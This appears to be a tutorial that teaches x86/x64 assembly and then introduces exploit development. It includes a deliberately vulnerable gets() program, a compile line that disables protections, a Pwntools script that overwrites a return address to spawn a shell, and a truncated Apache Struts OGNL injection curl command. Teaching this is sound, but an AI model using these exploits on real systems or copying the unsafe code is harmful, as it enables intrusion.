x86 and x64 Assembly from Scratch

🎯 Objective

To gain a deep, foundational understanding of how x86 and x64 assembly work, from CPU registers and calling conventions to memory addressing and function calls. This is critical for exploit developers who need precise control over memory, registers, and the instruction pointer.

1. Why Learn Assembly for Exploitation?

Exploit developers operate close to the metal, at the point where programming languages are compiled into instructions the CPU can execute directly. Memory corruption bugs, ROP chains, shellcode, and other low-level payloads all require an understanding of register state, stack layout, and control flow.

In exploit development:

You overwrite a saved return address or function pointer to control EIP or RIP
You pivot the stack by redirecting ESP or RSP
You inject shellcode and need to place arguments in registers or memory
You must understand how values are passed and returned at the assembly level

2. Architecture Overview: x86 vs x64

2.1 x86 (32-bit)

4-byte registers (e.g., eax, ebx)
4GB virtual address space
Arguments passed via stack
Used in legacy applications or 32-bit systems

2.2 x64 (64-bit)

8-byte registers (rax, rbx)
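64-bit pointers and a far larger address space (2^64 bytes, or 16 EiB, in theory; current CPUs typically implement 48-bit or 57-bit virtual addresses)
First arguments passed in registers (Windows: first 4 in rcx, rdx, r8, r9; System V: first 6 in rdi, rsi, rdx, rcx, r8, r9)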
Return values in rax

2.3 Register Subdivisions

Example (x64):

Register:         rax (64-bit)
 └── eax (low 32 bits)
     └── ax (low 16 bits)
         ├── ah (bits 8-15, high byte of ax)
         └── al (bits 0-7, low byte of ax)
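The aliasing shown in the diagram can be modeled with bit masks. The following is a minimal Python sketch, used here only as a calculator; the helper name `sub_registers` and the sample value are assumptions for illustration.

```python
def sub_registers(rax: int) -> dict:
    """Split a 64-bit value into the views named eax, ax, ah, and al."""
    rax &= 0xFFFFFFFFFFFFFFFF          # keep only 64 bits
    return {
        "rax": rax,
        "eax": rax & 0xFFFFFFFF,       # low 32 bits
        "ax": rax & 0xFFFF,            # low 16 bits
        "ah": (rax >> 8) & 0xFF,       # bits 8-15
        "al": rax & 0xFF,              # bits 0-7
    }

views = sub_registers(0x1122334455667788)
for name, value in views.items():
    print(f"{name}: {value:#x}")
```

One detail the masks do not capture: on x64, writing to eax zeroes the upper 32 bits of rax, whereas writing to ax, ah, or al leaves the remaining bits untouched.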

3. Register Classifications

Class	Registers (x86/x64)	Description
General-purpose	`eax`, `ebx`, `ecx`, `edx` / `rax`…	Arithmetic, logic, data movement
Stack-related	`esp`, `ebp` / `rsp`, `rbp`	Stack pointer/base pointer
Instruction	`eip` / `rip`	Holds address of next instruction
Flags	`eflags` / `rflags`	Status indicators (ZF, CF, SF)
Segment	`cs`, `ds`, `es`, `ss`, `fs`, `gs`	Mostly legacy in flat userland memory; `fs`/`gs` still locate thread-local data (TLS, TEB)
SIMD/FPU	`xmm0–xmm15`, `st0–st7`, `mm0–mm7`	Vector ops, floating point, MMX

4. Instruction Types and Syntax (Intel Style)

4.1 Syntax Format

instruction destination, source

4.2 Common Instructions

Category	Example	Meaning
Data Move	`mov eax, ebx`	Copy `ebx` to `eax`
Arithmetic	`add eax, 4`	`eax += 4`
Logical	`and eax, 0xFF`	Clear all but lower byte
Shift	`shr eax, 1`	Shift right by 1 (unsigned divide by 2)
Stack	`push ebp`, `pop eax`	Push/pop stack values
Control	`call`, `ret`, `jmp`, `je`, `jne`	Control flow

5. Addressing Modes and Operand Types

5.1 Addressing Types

Mode	Syntax	Example
Immediate	Value constant	`mov eax, 1`
Register	CPU register	`mov eax, ebx`
Direct Memory	Absolute addr	`mov eax, [0x12345678]`
Indirect Memory	Register ptr	`mov eax, [ebx]`
Base + Displacement	Register + constant offset	`mov eax, [ebp+4]`
Indexed	Base + index*scale	`mov eax, [ebx+esi*4]`
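Every memory operand in the table reduces to one formula: base + index*scale + displacement. The sketch below computes that effective address in Python; the function name `effective_address` and the register values are hypothetical, chosen only to illustrate the arithmetic.

```python
def effective_address(base=0, index=0, scale=1, disp=0, bits=32):
    """Compute base + index*scale + disp, wrapped to the address width."""
    if scale not in (1, 2, 4, 8):
        raise ValueError("x86 only encodes scale factors of 1, 2, 4, or 8")
    return (base + index * scale + disp) & ((1 << bits) - 1)

ebp = 0xBFFFF000  # hypothetical frame pointer value
print(hex(effective_address(base=ebp, disp=4)))               # [ebp+4]
print(hex(effective_address(base=ebp, disp=-8)))              # [ebp-8]
print(hex(effective_address(base=0x1000, index=3, scale=4)))  # [ebx+esi*4] with ebx=0x1000, esi=3
```

Positive offsets from ebp usually reach the return address and arguments, while negative offsets reach local variables.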

5.2 Operand Sizes

BYTE PTR [mem]: 8-bit
WORD PTR [mem]: 16-bit
DWORD PTR [mem]: 32-bit
QWORD PTR [mem]: 64-bit
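The size specifier decides how many bytes are read starting at the same address. A small Python sketch of that idea, assuming eight made-up bytes in memory and a hypothetical helper `load`:

```python
memory = bytes.fromhex("efbeadde78563412")  # 8 hypothetical bytes at [mem]

def load(mem: bytes, size: int) -> int:
    """Read `size` bytes from the start of mem as a little-endian integer."""
    return int.from_bytes(mem[:size], "little")

for name, size in [("BYTE", 1), ("WORD", 2), ("DWORD", 4), ("QWORD", 8)]:
    print(f"{name:5} PTR [mem] = {load(memory, size):#x}")
```

Because x86 is little-endian, the byte at the lowest address becomes the least significant byte of the loaded value.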

6. Memory Layout and Stack Anatomy

Typical process memory layout:

0xFFFFFFFF  ← Stack Top (grows down)
     |
     | Stack (local vars, return addr)
     |
     | Heap (malloc/calloc/free - grows up)
     |
     | BSS (uninitialized globals)
     |
     | Data (initialized globals)
     |
     | Text (code, .text segment - executable)
0x00000000  ← Null page

7. Calling Conventions

7.1 cdecl (x86 Linux default)

Arguments pushed right-to-left
Return value in eax
Caller cleans stack

7.2 stdcall (Windows APIs)

Arguments pushed right-to-left
Return value in eax
Callee cleans stack

7.3 fastcall (Microsoft optimized)

First two arguments in ecx and edx, the rest on the stack
Callee cleans stack

7.4 System V AMD64 ABI (Linux x64)

Argument	Register
arg1	`rdi`
arg2	`rsi`
arg3	`rdx`
arg4	`rcx`
arg5	`r8`
arg6	`r9`

Return: rax

7.5 Windows x64 Calling Convention

Argument	Register
arg1	`rcx`
arg2	`rdx`
arg3	`r8`
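arg4	`r9`

Return: rax. Arguments beyond the fourth go on the stack, and the caller reserves 32 bytes of shadow space for the register arguments.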
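To compare the two x64 conventions side by side, the sketch below maps a list of integer arguments to their locations. It is a simplification under stated assumptions: only integer and pointer arguments are modeled (floating-point arguments use xmm registers), and the names `place_args`, `SYSV_REGS`, and `WIN64_REGS` are hypothetical.

```python
SYSV_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]   # System V AMD64
WIN64_REGS = ["rcx", "rdx", "r8", "r9"]                # Windows x64

def place_args(args, abi):
    """Map integer arguments to registers, spilling the rest to the stack."""
    regs = SYSV_REGS if abi == "sysv" else WIN64_REGS
    in_regs = dict(zip(regs, args))        # zip stops at the shorter list
    on_stack = list(args[len(regs):])      # whatever did not fit in registers
    return in_regs, on_stack

print(place_args([1, 2, 3, 4, 5, 6, 7], "sysv"))
print(place_args([1, 2, 3, 4, 5, 6, 7], "win64"))
```

This matters when building ROP chains: the gadgets needed to load the first argument differ between platforms (pop rdi on Linux, pop rcx on Windows).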

8. Function Prologue and Epilogue

x86 Example

push ebp
mov ebp, esp
sub esp, XX         ; allocate space
...
mov esp, ebp
pop ebp
ret

Why It Matters

Stack frames are key for local variables
Exploits often overwrite saved EIP/RIP on stack
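The frame that the prologue builds can be described as offsets from ebp. The following Python sketch assumes a textbook frame with no compiler padding or alignment slack (real compilers often add some), and the helper name `frame_layout` is hypothetical.

```python
def frame_layout(local_bytes: int, word: int = 4):
    """Offsets relative to ebp after `push ebp; mov ebp, esp; sub esp, N`."""
    return {
        "first argument": +2 * word,     # [ebp+8] on x86
        "saved return address": +word,   # [ebp+4], pushed by call
        "saved ebp": 0,                  # [ebp], pushed by the prologue
        "locals start": -local_bytes,    # [ebp-N], lowest local address
    }

layout = frame_layout(local_bytes=64)
# Distance from the start of a 64-byte local buffer to the return address
# (assumes the buffer sits at the very bottom of the locals, no padding).
offset = layout["saved return address"] - layout["locals start"]
print(layout, offset)
```

Under these assumptions, 68 bytes of input reach the saved return address on x86. In practice the exact offset should be confirmed in a debugger.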

9. Flags Register (EFLAGS/RFLAGS)

Flag	Meaning
ZF (Zero Flag)	Set if result is 0
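CF (Carry Flag)	Set on carry or borrow out of the top bit (unsigned overflow)
SF (Sign Flag)	Set if the result's top bit is 1 (negative when signed)
OF (Overflow)	Set if signed overflow
PF (Parity)	Set if the low byte of the result has an even number of 1 bits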

Used with:

cmp, test, je, jg, jl, jne, jz, jnz
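To make the flag definitions concrete, the sketch below computes the flags that a 32-bit `add` would set. It models addition only (subtraction and `cmp` treat CF as a borrow), and the function name `add32_flags` is an assumption for illustration.

```python
def add32_flags(a: int, b: int) -> dict:
    """Return the 32-bit result of a + b and the flags `add` would set."""
    mask = 0xFFFFFFFF
    a &= mask
    b &= mask
    full = a + b
    result = full & mask
    sign = lambda v: (v >> 31) & 1
    return {
        "result": result,
        "ZF": int(result == 0),
        "CF": int(full > mask),                       # unsigned carry out
        "SF": sign(result),
        # signed overflow: operands share a sign that the result lacks
        "OF": int(sign(a) == sign(b) and sign(result) != sign(a)),
        "PF": int(bin(result & 0xFF).count("1") % 2 == 0),  # low byte only
    }

print(add32_flags(0xFFFFFFFF, 1))   # wraps to 0: ZF and CF set
print(add32_flags(0x7FFFFFFF, 1))   # signed overflow: SF and OF set
```

Conditional jumps read these bits: je/jz jump when ZF is set, while jg and jl combine ZF, SF, and OF for signed comparisons.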

10. Interrupts and Syscalls

Linux (x86):

mov eax, 1   ; syscall number: exit
mov ebx, 0   ; exit code
int 0x80     ; software interrupt

Linux (x64):

mov rax, 60  ; syscall: exit
mov rdi, 0   ; exit code
syscall

11. Loop and String Instructions

Looping

mov ecx, 10
loop_label:
; code
loop loop_label  ; decrements ecx, jumps if ecx != 0

String Instructions (with REP prefix)

movsb, movsw, movsd
cmpsb, stosb, scasb, lodsb
rep, repe, repne
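The REP prefix repeats a string instruction ecx times. As a rough model, the Python sketch below imitates `rep movsb` with the direction flag clear; the function name `rep_movsb` and the flat bytearray standing in for memory are assumptions for illustration.

```python
def rep_movsb(memory: bytearray, esi: int, edi: int, ecx: int):
    """Model `rep movsb` with the direction flag clear (DF=0)."""
    while ecx != 0:
        memory[edi] = memory[esi]   # movsb: copy one byte from [esi] to [edi]
        esi += 1                    # both pointers advance when DF=0
        edi += 1
        ecx -= 1                    # rep: decrement the counter each iteration
    return esi, edi, ecx

mem = bytearray(b"HELLO" + bytes(5))
regs = rep_movsb(mem, esi=0, edi=5, ecx=5)
print(mem, regs)
```

This is essentially a memcpy in one instruction, which is why `rep movsb` and `rep stosb` appear so often in disassembled copy and fill routines.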

12. Writing Inline Assembly in C

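#include <stdio.h>

int main(void) {
    int a = 5, b = 3, result;
    __asm__(
        "movl %1, %%eax;"    // eax = a
        "addl %2, %%eax;"    // eax += b
        "movl %%eax, %0;"    // result = eax
        : "=r"(result)       // output operand (%0)
        : "r"(a), "r"(b)     // input operands (%1, %2)
        : "%eax", "cc"       // clobbered: eax and the flags
    );
    printf("%d\n", result);  // prints 8
    return 0;
}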

13. Compiling and Running Pure Assembly

hello.asm (NASM + Linux)

section .data
    msg db "Hello!", 0xA
    len equ $ - msg

section .text
    global _start

_start:
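    mov eax, 4          ; syscall number: write
    mov ebx, 1          ; fd 1 = stdout
    mov ecx, msg        ; pointer to the string
    mov edx, len        ; number of bytes to write
    int 0x80

    mov eax, 1          ; syscall number: exit
    xor ebx, ebx        ; exit code 0
    int 0x80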

nasm -f elf hello.asm
ld -m elf_i386 hello.o -o hello
./hello

14. Reverse Engineering and Disassembly

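Use objdump, GDB, Ghidra, or radare2. objdump prints AT&T syntax by default, so pass -M intel to match the Intel syntax used in this chapter:

objdump -d -M intel binary
gdb ./binary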

Look for:

Function prologue: push ebp; mov ebp, esp
Function calls: call 0x08048400
Stack usage: mov eax, [ebp+0x8]

15. Tools and Emulators

Tool	Use
NASM	Write x86 ASM
GDB + Pwndbg	Debugging
x64dbg	Windows reversing
Godbolt	C to Assembly
Ghidra	Disassembler
Radare2	RE suite
Online x86 Emulator	Run x86 code in browser

✅ Summary

Assembly allows direct control of CPU and memory.
Key registers (eax, esp, eip) are critical for understanding control flow and payload placement.
Stack frames, calling conventions, and memory addressing are the basis of buffer overflows and ROP chains.
Tools like NASM, GDB, x64dbg, and Ghidra will help analyze and write exploits.

What is Exploit Development?

“Understanding the art of turning bugs into code execution”

🎯 Objective

To build a comprehensive understanding of what exploit development is, its goals, classifications, and how attackers leverage vulnerabilities to hijack program execution. This chapter covers vulnerability classes, real-world scenarios, memory manipulation techniques, and low-level primitives that form the core of exploitation.

1.1 What is an Exploit?

An exploit is a crafted input, payload, or sequence of interactions that takes advantage of a vulnerability in software to achieve unintended behavior, usually with malicious or unauthorized intent.

These behaviors may include:

Executing arbitrary code
Reading or writing sensitive memory
Causing a crash (Denial of Service)
Escalating privileges
Bypassing application logic

Example

// vulnerable.c
#include <stdio.h>

int main() {
    char buffer[100];
    gets(buffer); // vulnerable to buffer overflow
    printf("You entered: %s\n", buffer);
    return 0;
}

If the input exceeds 100 bytes, gets() writes past the end of buffer and can overwrite the saved return address on the stack, so the function returns to an attacker-chosen address.

1.2 Exploit vs Payload vs Shellcode

Term	Description
Exploit	The method of taking control (e.g., stack buffer overflow, use-after-free)
Payload	The action performed once control is gained (e.g., spawn shell, reverse shell)
Shellcode	Compact machine code payload, usually to open a shell or call system functions

1.3 Exploitation Workflow

Discovery – Identify the vulnerability
Analysis – Reverse engineer the bug
Trigger – Create the condition to exploit it
Control – Gain instruction pointer (IP) control
Payload Execution – Run arbitrary code or commands
Post-Exploitation – Escalate privileges, persist, exfiltrate data

1.4 Exploitation Goals

Goal	Explanation
Code Execution	Execute arbitrary shellcode, malware, or system calls
Privilege Escalation	Elevate from user → admin/root/system
Information Disclosure	Leak memory (e.g., ASLR bypass, passwords)
Denial of Service	Crash system/service
Persistence	Survive reboots, re-infections
Evasion	Avoid AV, EDR, and logging tools

1.5 Exploit Types (By Technique)

Memory Corruption-Based

Stack Buffer Overflow
Overwriting return address on the stack.
Heap Overflow
Overwriting heap structures to gain arbitrary write or control flow.
Use-After-Free (UAF)
Using memory after it has been freed; attacker reallocates it with malicious data.
Double Free
Two free() calls on the same pointer can corrupt heap metadata.
Format String Bug
Passing attacker-controlled data as the format string, as in printf(user_input), allows arbitrary memory reads and writes.
Integer Overflow/Underflow
Arithmetic that wraps around can bypass size checks and produce undersized memory allocations.
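The integer overflow case is easy to underestimate, so here is a worked example. The Python sketch below imitates the 32-bit unsigned multiplication a C program might use to size an array; the function name `alloc_size_32` and the element count are hypothetical.

```python
def alloc_size_32(count: int, elem_size: int) -> int:
    """Size a C program would compute with 32-bit unsigned arithmetic."""
    return (count * elem_size) & 0xFFFFFFFF   # wraps modulo 2^32

count = 0x40000001          # attacker-supplied element count (hypothetical)
size = alloc_size_32(count, 4)
print(f"requested elements: {count:#x}, bytes allocated: {size}")
```

The program believes it has room for more than a billion 4-byte elements, yet only 4 bytes are allocated. Any loop that then writes `count` elements becomes a heap overflow.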

Logical Vulnerabilities

Race Conditions
Timing issues in multithreaded environments.
Improper Access Control
Missing authentication or authorization checks.
Insecure Deserialization
Arbitrary object creation from untrusted data.

1.6 Real Exploitation Example

Here’s a simple Linux example of stack-based control hijacking.

vulnerable.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void secret() {
    printf("PWNED! Code execution achieved!\n");
    system("/bin/sh");
}

void vulnerable() {
    char buffer[64];
    printf("Enter input: ");
    gets(buffer); // unsafe
}

int main() {
    vulnerable();
    return 0;
}

Compile with protections disabled:

gcc vulnerable.c -o vuln -fno-stack-protector -z execstack -no-pie

Exploitation Steps

Overflow buffer and overwrite return address
Redirect execution to secret()
Shell spawned

You can use Pwntools to automate the attack:

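from pwn import *

elf = ELF('./vuln')            # parse the binary to resolve symbols
context.binary = elf           # set the architecture (amd64) for packing helpers
p = process(elf.path)

payload = b'A' * 72            # 64-byte buffer + 8-byte saved rbp
payload += p64(elf.symbols['secret'])  # overwrite the saved return address

p.sendlineafter(b'Enter input: ', payload)
p.interactive()                # hand the spawned shell to the user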
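For readers without Pwntools installed, the same payload bytes can be built with the standard library alone. This is a sketch under stated assumptions: the buffer is assumed to sit directly below the saved rbp (confirm the offset in a debugger), and `SECRET_ADDR` is a hypothetical address that must be replaced with the real one, for example from `nm vuln`.

```python
import struct

BUFFER_SIZE = 64        # char buffer[64] in vulnerable()
SAVED_RBP_SIZE = 8      # saved frame pointer on x64
SECRET_ADDR = 0x401176  # hypothetical address; look up the real one with `nm vuln`

padding = b"A" * (BUFFER_SIZE + SAVED_RBP_SIZE)
payload = padding + struct.pack("<Q", SECRET_ADDR)  # little-endian 64-bit, like p64()

print(len(padding), payload[-8:].hex())
```

The `<Q` format packs the address as eight little-endian bytes, which is the order in which the CPU reads the return address back off the stack.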

1.7 Common Exploit Development Toolset

Tool	Purpose	Link
GDB	Debugging on Linux	https://www.gnu.org/software/gdb/
Pwndbg	GDB plugin for exploit dev	https://github.com/pwndbg/pwndbg
Pwntools	Python framework for writing exploits	https://github.com/Gallopsled/pwntools
x64dbg	Windows GUI debugger	https://x64dbg.com/
Immunity Debugger	SEH exploit development	https://www.immunityinc.com/products/debugger/
IDA Pro / Ghidra	Reverse engineering	https://ghidra-sre.org/
ROPgadget	ROP chain finder	https://github.com/JonathanSalwan/ROPgadget
Mona.py	ROP + exploit helper for Immunity	https://github.com/corelan/mona
Radare2	Binary analysis CLI tool	https://rada.re/n/
msfvenom	Shellcode & payload generator	https://docs.metasploit.com/

1.8 Architectural Concepts

Registers
- x86: eax, ebx, esp, ebp, eip
- x64: rax, rbx, rsp, rbp, rip
Calling Conventions
- cdecl (caller cleans up stack)
- stdcall (callee cleans up stack)
- fastcall, System V AMD64 (RDI, RSI, RDX, RCX, R8, R9), Windows x64 (RCX, RDX, R8, R9)
Endianness
- x86 and x64 are little-endian (e.g., 0xdeadbeef stored as ef be ad de)

1.9 Operating System Security Mechanisms

Mitigation	Description
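DEP / NX	Marks stack and heap pages non-executable
ASLR	Randomizes the base addresses of the stack, heap, and libraries
Stack Cookies	Canary values to detect buffer overflows
SafeSEH / SEHOP	Validate Structured Exception Handling (SEH) records (Windows)
SMEP / KASLR	Kernel protections: no kernel-mode execution of user pages; randomized kernel base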

We will cover bypass techniques for these later in:

Return Oriented Programming (ROP)
ret2libc
Shellcode relocation
Heap grooming
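As an illustration of the stack cookie mitigation from the table, the Python sketch below models a frame laid out as buffer, canary, return address. It is a toy model, not how a compiler implements the check: the function name `run_with_canary`, the 16-byte buffer, and the frame layout are assumptions.

```python
import secrets

def run_with_canary(user_input: bytes, buffer_size: int = 16) -> str:
    """Model a stack frame laid out as [buffer][canary][return address]."""
    canary = secrets.token_bytes(8)     # random value chosen at startup
    frame = bytearray(buffer_size) + bytearray(canary) + bytearray(8)
    # Unchecked copy, like gets(): writes past the buffer if input is too long.
    n = min(len(user_input), len(frame))
    frame[:n] = user_input[:n]
    # Epilogue check: compare the stored canary before using the return address.
    if bytes(frame[buffer_size:buffer_size + 8]) != canary:
        return "stack smashing detected"
    return "returned normally"

print(run_with_canary(b"A" * 8))    # fits in the buffer
print(run_with_canary(b"A" * 32))   # overruns the canary and return address
```

A linear overflow cannot reach the return address without first corrupting the canary, which is why bypasses usually depend on leaking the canary value or on a write primitive that skips over it.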

1.10 Real-World Exploit Example (CVE)

CVE-2017-5638 – Apache Struts2 RCE

Vulnerability: Crafted Content-Type header triggers OGNL injection.
Exploit: curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}" \ http://target.com/struts2-showcase/upload.action

Another: CVE-2017-0144 – EternalBlue

Microsoft SMBv1 vulnerability, patched in MS17-010
Used in WannaCry ransomware
Kernel-level remote exploit on Windows XP to Windows 7

1.11 Ethics and Legal Responsibility

Exploit development is highly sensitive and legally restricted when performed outside ethical boundaries.

Use only in:

Lab environments
Capture the Flag (CTF) competitions
Bug bounty programs
With explicit authorization

Unauthorized access or exploitation is illegal and unethical.

✅ Summary

An exploit is not just a payload but the entire logic and sequence required to hijack control flow.
Memory corruption (e.g., buffer overflow, UAF) is a primary class of vulnerabilities.
The exploitation process involves discovery, analysis, triggering, gaining control, payload execution, and post-exploitation.
A good exploit developer is part developer, part reverse engineer, and part OS internals expert.
Modern defenses like DEP, ASLR, and stack cookies require advanced techniques to bypass.